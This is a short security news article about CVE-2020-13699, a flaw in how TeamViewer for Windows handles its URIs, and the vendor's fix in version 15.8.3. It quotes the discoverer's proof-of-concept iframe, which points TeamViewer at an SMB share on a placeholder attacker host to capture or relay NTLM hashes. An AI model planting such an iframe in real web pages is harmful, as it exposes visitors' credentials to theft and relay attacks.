[German]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.
The vulnerability CVE-2020-13699
Vulnerability CVE-2020-13699 affected the TeamViewer Desktop for Windows up to version 15.8.2, which does not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:
teamviewer10: –play URL
This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking. The discoverer of the vulnerability describes it here as follows.
An attacker could embed a malicious iframe in a website with a crafted URL:
<iframe src=”teamviewer10: –play \\attacker-IP\share\fake.tvs”>
that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).
This could be used in Watering Hole attacks to connect unnoticed, as you can read here. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited.
Update to TeamViewer version 15.8.3
With Bleeping Computer I noticed here that there was an update of TeamViewer to version 15.8.3 which closes the vulnerability. However, the vendor announced the update in this community post about 2 weeks ago.
Statement on CVE 2020-13699
Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.
We implemented some improvements in URI handling relating to CVE 2020-13699.
The changes can be found in the changelog.